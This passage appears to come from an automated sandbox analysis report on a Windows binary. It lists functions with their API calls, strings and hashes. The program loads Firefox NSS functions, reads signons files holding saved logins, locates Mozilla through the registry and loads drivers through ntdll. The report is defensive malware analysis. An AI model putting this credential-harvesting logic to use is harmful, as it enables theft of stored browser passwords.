                                                  • Opcode Fuzzy Hash: c5dfa419d5e156fd18e38bb9fe1657a50580db14dfc2297f0345cb0c168ef583
                                                  • Instruction Fuzzy Hash: F151627290021CBADB20EB55CD45ECEB7BCAF14744F5044B7B10DA2091EB789B888F6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040D1D0, Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 254windowregistryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040A2C8: LoadMenuW.USER32 ref: 0040A2D0
                                                  • SetMenu.USER32(?,00000000), ref: 0040D2E0
                                                  • CreateStatusWindowW.COMCTL32(50000000,Function_000434FC,?,00000101), ref: 0040D2FB
                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 0040D313
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D322
                                                  • LoadImageW.USER32 ref: 0040D32F
                                                  • CreateToolbarEx.COMCTL32(?,50010900,00000102,00000006,00000000,00000000,?,00000007,00000010,00000010,00000060,00000010,00000014), ref: 0040D359
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040D366
                                                  • CreateWindowExW.USER32 ref: 0040D38D
                                                  • GetFileAttributesW.KERNEL32(004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D468
                                                  • GetTempPathW.KERNEL32(00000104,004518A8,?,00000000,/nosaveload,00000000,00000001), ref: 0040D478
                                                  • wcslen.MSVCRT ref: 0040D47F
                                                  • wcslen.MSVCRT ref: 0040D48D
                                                  • RegisterWindowMessageW.USER32(commdlg_FindReplace,00000001,?,00000000,/nosaveload,00000000,00000001), ref: 0040D4DA
                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 0040D515
                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 0040D528
                                                    • Part of subcall function 00403A14: wcslen.MSVCRT ref: 00403A31
                                                    • Part of subcall function 00403A14: SendMessageW.USER32(?,00001061,?,?), ref: 00403A55
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Message$Send$CreateWindowwcslen$HandleLoadMenuModule$AttributesFileImagePathRegisterStatusTempToolbar
                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html
                                                  • API String ID: 1638525581-2103577948
                                                  • Opcode ID: 09239095896d852bc9637f75337da0b8f677ca08e5855ea8ee30249aa1057c49
                                                  • Instruction ID: 7a0d9eec849a31f4480aab016bccc9be6ec6f6c883519ecda8bf5f9757aa8271
                                                  • Opcode Fuzzy Hash: 09239095896d852bc9637f75337da0b8f677ca08e5855ea8ee30249aa1057c49
                                                  • Instruction Fuzzy Hash: D7A1A171500388AFEB11DF68CC89BCA7FA5AF55704F04447DFA486B292C7B59908CB69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406DD9, Relevance: 33.5, APIs: 15, Strings: 4, Instructions: 222COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB20
                                                    • Part of subcall function 0040FAFF: GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,00000000), ref: 0040FB69
                                                    • Part of subcall function 0040FAFF: SetCurrentDirectoryW.KERNEL32(?,?,?,00000000), ref: 0040FB76
                                                    • Part of subcall function 0040FAFF: memset.MSVCRT ref: 0040FB90
                                                    • Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FB9D
                                                    • Part of subcall function 0040FAFF: wcslen.MSVCRT ref: 0040FBAC
                                                    • Part of subcall function 0040FAFF: GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040FBE7
                                                    • Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC03
                                                    • Part of subcall function 0040FAFF: LoadLibraryExW.KERNEL32(?,00000000,00000008,?,?,?,?,?,00000000), ref: 0040FC1A
                                                    • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Init), ref: 0040FC2F
                                                    • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 0040FC3B
                                                    • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 0040FC47
                                                    • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 0040FC53
                                                    • Part of subcall function 0040FAFF: GetProcAddress.KERNEL32(?,PK11_CheckUserPassword), ref: 0040FC5F
                                                  • memset.MSVCRT ref: 00406E17
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,?,00000000,?), ref: 00406E30
                                                  • memset.MSVCRT ref: 00406E69
                                                  • memset.MSVCRT ref: 00406E81
                                                  • memset.MSVCRT ref: 00406E99
                                                  • memset.MSVCRT ref: 00406EB1
                                                  • wcslen.MSVCRT ref: 00406EBC
                                                  • wcslen.MSVCRT ref: 00406ECA
                                                  • wcslen.MSVCRT ref: 00406EF9
                                                  • wcslen.MSVCRT ref: 00406F07
                                                  • wcslen.MSVCRT ref: 00406F36
                                                  • wcslen.MSVCRT ref: 00406F44
                                                  • wcslen.MSVCRT ref: 00406F73
                                                  • wcslen.MSVCRT ref: 00406F81
                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00407074
                                                    • Part of subcall function 0040697E: memset.MSVCRT ref: 004069BD
                                                    • Part of subcall function 0040697E: memset.MSVCRT ref: 00406A3C
                                                    • Part of subcall function 0040697E: memset.MSVCRT ref: 00406A51
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetwcslen$AddressProc$CurrentDirectory$LibraryLoad$ByteCharHandleModuleMultiWide
                                                  • String ID: signons.sqlite$signons.txt$signons2.txt$signons3.txt
                                                  • API String ID: 1908949080-2435954524
                                                  • Opcode ID: 00d903caa4eb60a1b1d619f3f2ea5d5f954a86edb9cfa0049ad989ed505ac937
                                                  • Instruction ID: 8f96e2222c77d76af5181fd0f533d019f0899d465181413e0b466bd376840954
                                                  • Opcode Fuzzy Hash: 00d903caa4eb60a1b1d619f3f2ea5d5f954a86edb9cfa0049ad989ed505ac937
                                                  • Instruction Fuzzy Hash: 8871B07180461AABDB21EF61DC41A9E77BCFF04318F1004AEF909F2181E779AE548F69
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00441C15, Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 139COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00441C46
                                                  • GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
                                                  • VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
                                                  • VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
                                                  • _snwprintf.MSVCRT ref: 00441CC6
                                                  • wcscpy.MSVCRT ref: 00441CF0
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00441DA0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: FileInfoQueryValueVersion$??2@??3@Size_snwprintfwcscpy
                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                  • API String ID: 1223191525-1542517562
                                                  • Opcode ID: 76175b8a86119ebe01a83dcd535ce8ac3cdcc4dd7478e422eacbcfec517dbd2c
                                                  • Instruction ID: 5dc843b0b2888ef0cde47c2e58fd974eed7f8edc5a370bbe46a7031584b3d011
                                                  • Opcode Fuzzy Hash: 76175b8a86119ebe01a83dcd535ce8ac3cdcc4dd7478e422eacbcfec517dbd2c
                                                  • Instruction Fuzzy Hash: 044143B2940618BAE704EFA1EC82DDEB7BCFF08744B400557B505A3151DB78BA85CBE8
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040C8CF, Relevance: 33.1, APIs: 22, Instructions: 137windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040C912
                                                  • memset.MSVCRT ref: 0040C927
                                                  • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
                                                  • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C970
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C97B
                                                  • SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
                                                  • SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
                                                  • LoadImageW.USER32 ref: 0040C9F8
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
                                                  • LoadImageW.USER32 ref: 0040CA15
                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
                                                  • GetSysColor.USER32(0000000F), ref: 0040CA2E
                                                  • ImageList_AddMasked.COMCTL32(?,00000000,00000000), ref: 0040CA49
                                                  • ImageList_AddMasked.COMCTL32(?,?,?), ref: 0040CA59
                                                  • DeleteObject.GDI32(?), ref: 0040CA65
                                                  • DeleteObject.GDI32(?), ref: 0040CA6B
                                                  • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 0040CA88
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Image$List_$CountCreateMessageSend$DeleteHandleLoadMaskedModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  • API String ID: 304928396-0
                                                  • Opcode ID: 45911c1970665382fa90db5d41abc719a2ef46b241cbde3be6a9b9b2f588298f
                                                  • Instruction ID: 0a3ff62ab3886bf523a191411b010267208ec01492d8cd9208f2635b8a46902f
                                                  • Opcode Fuzzy Hash: 45911c1970665382fa90db5d41abc719a2ef46b241cbde3be6a9b9b2f588298f
                                                  • Instruction Fuzzy Hash: A541B871640304BFE7209F70CC8AF97B7ACFB09B45F000929F399A51D1C6B5A9408B29
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040648C, Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 173registrytimeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 004064AD
                                                    • Part of subcall function 00411B67: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00412303,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,?), ref: 00411B7A
                                                  • _wcsnicmp.MSVCRT ref: 00406520
                                                  • memset.MSVCRT ref: 00406544
                                                  • memset.MSVCRT ref: 00406560
                                                  • _snwprintf.MSVCRT ref: 00406580
                                                  • wcsrchr.MSVCRT ref: 004065A7
                                                  • CompareFileTime.KERNEL32(?,?,00000000), ref: 004065DA
                                                  • wcscpy.MSVCRT ref: 004065FC
                                                  • memset.MSVCRT ref: 004064FA
                                                    • Part of subcall function 00411BFE: RegEnumKeyExW.ADVAPI32(00000000,0040FB38,0040FB38,?,00000000,00000000,00000000,0040FB38,0040FB38,00000000), ref: 00411C21
                                                  • RegCloseKey.ADVAPI32(0040FB38), ref: 00406634
                                                  • wcscpy.MSVCRT ref: 00406642
                                                  • ExpandEnvironmentStringsW.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104,?,?,?,?,00000000,?), ref: 00406659
                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,00000000,?), ref: 00406695
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memset$wcscpy$CloseCompareCurrentDirectoryEnumEnvironmentExpandFileOpenStringsTime_snwprintf_wcsnicmpwcsrchr
                                                  • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                  • API String ID: 1094916163-2797892316
                                                  • Opcode ID: 6fc1e2e3a791b033bf776d6d93ccb5a8b208ad6747335505a9b79a97a3079406
                                                  • Instruction ID: 63e98d9b0590a06fe0611c8d8f76d67a06a86b9579f74a21c863053dc4382b5e
                                                  • Opcode Fuzzy Hash: 6fc1e2e3a791b033bf776d6d93ccb5a8b208ad6747335505a9b79a97a3079406
                                                  • Instruction Fuzzy Hash: F5515472D00218BAEF20EB61DC45ADFB7BCAF04354F0104A6F905F2191EB799B94CB99
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004125BA, Relevance: 31.6, APIs: 12, Strings: 6, Instructions: 103COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  • API String ID: 3143752011-1996832678
                                                  • Opcode ID: 2ff61e6e61c45a42ec8a536e31393f15904b361fc50918dfd7b37e2d26dac3f0
                                                  • Instruction ID: 1bdd15307226dc02cd036ffdab734ce65306a7f25c134a46d7f370f8b7d92746
                                                  • Opcode Fuzzy Hash: 2ff61e6e61c45a42ec8a536e31393f15904b361fc50918dfd7b37e2d26dac3f0
                                                  • Instruction Fuzzy Hash: 2C31E9B2900305BEEB20AA559E82DBF73BCDF41715F60405FF214E21C2DABC9E859A1C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040FC89, Relevance: 31.5, APIs: 9, Strings: 9, Instructions: 41libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,004088B3,?,000000FF,00000000,00000104), ref: 0040FC9C
                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 0040FCB3
                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0040FCC5
                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0040FCD7
                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0040FCE9
                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 0040FCFB
                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 0040FD0D
                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 0040FD1F
                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 0040FD31
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressProc$HandleModule
                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                  • API String ID: 667068680-2887671607
                                                  • Opcode ID: d01a7573c8c1d70ed52b2f6ff8626cb2949720c0675fde4b879603f159105d12
                                                  • Instruction ID: df14504fdc59ccf6a8c55cbe4aacceea24f9204784c5926a31105bf4aba29bc2
                                                  • Opcode Fuzzy Hash: d01a7573c8c1d70ed52b2f6ff8626cb2949720c0675fde4b879603f159105d12
                                                  • Instruction Fuzzy Hash: 8E018478D40314BBEB119F71AC09B563EA9F7187967180977F41862272DBB98810EE8C
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040BEB4, Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 184COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040BED5
                                                  • memset.MSVCRT ref: 0040BEFF
                                                  • memset.MSVCRT ref: 0040BF15
                                                  • memset.MSVCRT ref: 0040BF2B
                                                  • _snwprintf.MSVCRT ref: 0040BF64
                                                  • wcscpy.MSVCRT ref: 0040BFAF
                                                  • _snwprintf.MSVCRT ref: 0040C03C
                                                  • wcscat.MSVCRT ref: 0040C06E
                                                    • Part of subcall function 0041248F: _snwprintf.MSVCRT ref: 004124B3
                                                  • wcscpy.MSVCRT ref: 0040C050
                                                  • _snwprintf.MSVCRT ref: 0040C0AD
                                                    • Part of subcall function 00407176: wcslen.MSVCRT ref: 00407183
                                                    • Part of subcall function 00407176: WriteFile.KERNEL32(00000001,00000000,00000000,00000000,00000000,?,?,0040BC47,00000000,00443980,00000000,0040C656,00000000), ref: 00407192
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _snwprintfmemset$wcscpy$FileWritewcscatwcslen
                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                  • API String ID: 1277802453-601624466
                                                  • Opcode ID: afbe44f23bf8ba0960694767798beca720d6b7b0fa1b1000d23084d0d272dd1b
                                                  • Instruction ID: c023c2c05774347514c90e9c4a79a5fc261e79551634f2018d74b142c4ca0a41
                                                  • Opcode Fuzzy Hash: afbe44f23bf8ba0960694767798beca720d6b7b0fa1b1000d23084d0d272dd1b
                                                  • Instruction Fuzzy Hash: 6B619E31900208EFEF14EF94CC86EAEBB79EF44314F50419AF905AA1D2DB75AA51CF58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004126E8, Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 120COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _snwprintf$memset$wcscpy
                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                  • API String ID: 2000436516-3842416460
                                                  • Opcode ID: 226d5b028e445a7516cf64f8fc5c05c3ce0576dee2713dde24e27e7b686f1b2e
                                                  • Instruction ID: df620ac0873104ba588d68bc57a3bc16e82c0a505241d1212890b0a23309d9f4
                                                  • Opcode Fuzzy Hash: 226d5b028e445a7516cf64f8fc5c05c3ce0576dee2713dde24e27e7b686f1b2e
                                                  • Instruction Fuzzy Hash: 03418371D402197AEB20EB55DD41EFB727CFF04304F4401AAB509E2181EB749B948F6A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004035E2, Relevance: 27.1, APIs: 18, Instructions: 66windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C912
                                                    • Part of subcall function 0040C8CF: memset.MSVCRT ref: 0040C927
                                                    • Part of subcall function 0040C8CF: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 0040C939
                                                    • Part of subcall function 0040C8CF: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 0040C957
                                                    • Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000001,?), ref: 0040C994
                                                    • Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040C9A8
                                                    • Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(00000000,00000006), ref: 0040C9B3
                                                    • Part of subcall function 0040C8CF: SendMessageW.USER32(?,00001003,00000000,?), ref: 0040C9CB
                                                    • Part of subcall function 0040C8CF: ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040C9D7
                                                    • Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040C9E6
                                                    • Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040C9F8
                                                    • Part of subcall function 0040C8CF: GetModuleHandleW.KERNEL32(00000000), ref: 0040CA03
                                                    • Part of subcall function 0040C8CF: LoadImageW.USER32 ref: 0040CA15
                                                    • Part of subcall function 0040C8CF: ImageList_SetImageCount.COMCTL32(?,00000000), ref: 0040CA26
                                                    • Part of subcall function 0040C8CF: GetSysColor.USER32(0000000F), ref: 0040CA2E
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F4
                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035FF
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000000,00000000), ref: 00403610
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403614
                                                  • LoadIconW.USER32(00000000,00000074), ref: 00403619
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000001,00000000), ref: 00403624
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403628
                                                  • LoadIconW.USER32(00000000,00000073), ref: 0040362D
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000002,00000000), ref: 00403638
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040363C
                                                  • LoadIconW.USER32(00000000,00000075), ref: 00403641
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000003,00000000), ref: 0040364C
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403650
                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403655
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000004,00000000), ref: 00403660
                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403664
                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403669
                                                  • ImageList_ReplaceIcon.COMCTL32(?,00000005,00000000), ref: 00403674
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Image$Icon$List_$HandleLoadModule$Replace$CountCreateMessageSendmemset$ColorDirectoryFileInfoWindows
                                                  • String ID:
                                                  • API String ID: 792915304-0
                                                  • Opcode ID: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
                                                  • Instruction ID: 62ec96a61e35675a05b55f01cd8090f0511f6faf4d41b9404683e1d7d0c62212
                                                  • Opcode Fuzzy Hash: cc435ca99fa3c831c04f4257ae775a7279f3e83e44ba77ecb565717d4c2bd910
                                                  • Instruction Fuzzy Hash: 6901E1A17957087AF53137B2EC4BF6B7B5EDF81F4AF214414F30C990E0C9A6AD105928
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00408D9D, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 165COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 004059F7: _wcsicmp.MSVCRT ref: 00405A28
                                                    • Part of subcall function 00405CF6: memset.MSVCRT ref: 00405DF2
                                                  • free.MSVCRT(00000000), ref: 00408F8C
                                                    • Part of subcall function 00408801: _wcsicmp.MSVCRT ref: 0040881A
                                                  • memset.MSVCRT ref: 00408E72
                                                    • Part of subcall function 0040805C: wcslen.MSVCRT ref: 0040806F
                                                    • Part of subcall function 0040805C: memcpy.MSVCRT ref: 0040808E
                                                  • wcschr.MSVCRT ref: 00408EAA
                                                  • memcpy.MSVCRT ref: 00408EDE
                                                  • memcpy.MSVCRT ref: 00408EF9
                                                  • memcpy.MSVCRT ref: 00408F14
                                                  • memcpy.MSVCRT ref: 00408F2F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                  • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                  • API String ID: 3849927982-2252543386
                                                  • Opcode ID: 3968a81090f0c90a0f1d759d5c6f86966b5d18dba44d1eb1d150c3d2a019c511
                                                  • Instruction ID: 190f3b00b4426260eb01f26a53b79380eacfea7d83453a492e965ac02b193b52
                                                  • Opcode Fuzzy Hash: 3968a81090f0c90a0f1d759d5c6f86966b5d18dba44d1eb1d150c3d2a019c511
                                                  • Instruction Fuzzy Hash: 64510C72E00309AAEF10EFA5DD45A9EB7B9AF54314F14403FA544F7281EA78AA048F58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00406B9F, Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 174stringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00407144: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,004421F7,00000000,?,00000000,00000000,00410671,?,?), ref: 00407156
                                                  • GetFileSize.KERNEL32(00000000,00000000,00000104,00000001,00000000,?,00407052,?,?,?,0000001E), ref: 00406BC8
                                                  • ??2@YAPAXI@Z.MSVCRT ref: 00406BDC
                                                    • Part of subcall function 00407B93: ReadFile.KERNEL32(?,?,5"D,00000000,00000000,?,?,00442235,00000000,00000000), ref: 00407BAA
                                                  • memset.MSVCRT ref: 00406C0B
                                                  • memset.MSVCRT ref: 00406C2B
                                                  • memset.MSVCRT ref: 00406C40
                                                  • strcmp.MSVCRT ref: 00406C64
                                                  • ??3@YAXPAX@Z.MSVCRT ref: 00406DC3
                                                  • CloseHandle.KERNEL32(Rp@,?,00407052,?,?,?,0000001E), ref: 00406DCC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Filememset$??2@??3@CloseCreateHandleReadSizestrcmp
                                                  • String ID: ---$Rp@
                                                  • API String ID: 2784192885-2834202798
                                                  • Opcode ID: 7cf5505fde5f7a6ca81fe01c549bb0ad296e6a7104cc4401806f668b22f45092
                                                  • Instruction ID: 5360a5981a47af023619c2d52a4e150b55de9ab2e9c88b676a0c17dd944fe9c5
                                                  • Opcode Fuzzy Hash: 7cf5505fde5f7a6ca81fe01c549bb0ad296e6a7104cc4401806f668b22f45092
                                                  • Instruction Fuzzy Hash: 2E51817290815DAAEF21DB558C819DEBBBCEF14304F1040FBE50AA3141DA389FD5DBA9
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040AA44, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • memset.MSVCRT ref: 0040AA6A
                                                  • memset.MSVCRT ref: 0040AA86
                                                    • Part of subcall function 0040757A: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040AB83,00000000,0040AA36,?,00000000,00000208,?), ref: 00407585
                                                    • Part of subcall function 00441C15: GetFileVersionInfoSizeW.VERSION(0040AAB8,?,00000000), ref: 00441C2B
                                                    • Part of subcall function 00441C15: ??2@YAPAXI@Z.MSVCRT ref: 00441C46
                                                    • Part of subcall function 00441C15: GetFileVersionInfoW.VERSION(0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C56
                                                    • Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441C69
                                                    • Part of subcall function 00441C15: VerQueryValueW.VERSION(00000000,\VarFileInfo\Translation,?,?,00000000,004482D0,0040AAB8,?,0040AAB8,00000000,?,00000000,00000000,0040AAB8,?,00000000), ref: 00441CA6
                                                    • Part of subcall function 00441C15: _snwprintf.MSVCRT ref: 00441CC6
                                                    • Part of subcall function 00441C15: wcscpy.MSVCRT ref: 00441CF0
                                                  • wcscpy.MSVCRT ref: 0040AACA
                                                  • wcscpy.MSVCRT ref: 0040AAD9
                                                  • wcscpy.MSVCRT ref: 0040AAE9
                                                  • EnumResourceNamesW.KERNEL32(0040ABE8,00000004,0040A818,00000000), ref: 0040AB4E
                                                  • EnumResourceNamesW.KERNEL32(0040ABE8,00000005,0040A818,00000000), ref: 0040AB58
                                                  • wcscpy.MSVCRT ref: 0040AB60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.245754614.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: wcscpy$File$EnumInfoNamesQueryResourceValueVersionmemset$??2@ModuleNameSize_snwprintf
